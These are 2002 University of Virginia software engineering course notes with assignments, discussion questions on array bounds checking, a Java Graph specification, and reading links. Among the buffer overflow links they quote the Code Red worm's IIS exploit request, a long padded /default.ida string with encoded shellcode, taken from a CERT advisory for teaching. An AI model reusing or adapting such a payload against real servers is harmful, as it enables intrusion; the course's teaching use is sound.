CS201J: Notes 12 September 2002

University of Virginia, Department of Computer Science
CS201J: Engineering Software, Fall 2002

Notes: Thursday 12 September 2002

Assignments Due

12 September: Read Ch 5.3-5.10
19 September: Problem Set 3
Upcoming lab hours: (Small Hall): Thursday, 5-7pm (Sol); 7-9pm (Tiffany); Sunday 4-6pm (Mike); Monday 6-8pm (Serge); Wednesday (18 Sept), 5-7pm (Sol); Wednesday (18 Sept), 8-9pm (Tiffany).
Notes and Questions

What are the advantages and disadvantages of each approach to array bounds errors:

No checking (C)

Run-time checking (Java)

Static checking (ESC/Java)

Graph Data Abstraction
In class Tuesday, we will work on implementing a Graph data abstraction that satisfies this specification:
public class Graph {
   // OVERVIEW: 
   //      A Graph is a mutable type that represents an undirected
   //      graph.  It consists of nodes that are named by Strings,
   //      and edges that connect a pair of nodes.
   //      A typical Graph is: < Nodes, Edges >
   //       where
   //         Nodes = { n1, n2, , nm }
   //       and 
   //         Edges = { {from_1, to_1}, , {from_n, to_n} }

   // Creator
   public Graph () 
      // EFFECTS: Initializes this to a graph
      //      with no nodes or edges: < {}, {} >.

   // Mutators
   public void addNode (String name)
      // REQUIRES: name is not the name of a node in this
      //  MODIFIES: this
      // EFFECTS: adds a node named name to this:
      //     this_post = < this_pre.nodes U { name }, this_pre.edges >

   public void addEdge (String fnode, String tnode)
      // REQUIRES: fnode and tnode are names of nodes in this.
      // MODIFIES: this
      // EFFECTS: Adds an edge from fnode to tnode to this:
      //       this_post = < this_pre.nodes, this_pre.edges U { {fnode, tnode} } >

   // Observers
   public boolean hasNode (String node)
      // EFFECTS: Returns true iff node is a node in this.

   public StringIterator nodes ()
      // EFFECTS: Returns the StringIterator that
      //      yields all nodes in this in arbitrary order.

   StringSet getNeighbors (String node)
      // REQUIRES: node is a node in this
      // EFFECTS: Returns the StringSet consisting of all nodes in this
      //      that are directly connected to node:
      //         \result =  { n | {node, n} is in this.edges }
}
Links

Buffer Overflows

CAIDA Analysis of Code Red
CERT Advisory. The request that exploits the buffer overflow vulnerability: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c 3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Smashing the Stack for Fun and Profit, Aleph One
Improving Security Using Extensible Lightweight Static Analysis (David Evans and David Larochelle), IEEE Software, Jan/Feb 2002.
Run-Time Exceptions

Reports on the Ariane 5 run-time exception: Lions Report (official inquiry), Jean-Marc Jiziquel and Bertrand Meyer Stephen Marshall (include video of explosion)
Our recommendation now is the same as our recommendation a month ago, if you haven't patched your software, do so now.
Scott Culp, security program manager for Microsoft's security response center

University of Virginia
Department of Computer Science
CS 201J: Engineering Software

Sponsored by the
National Science Foundation

cs201j-staff@cs.virginia.edu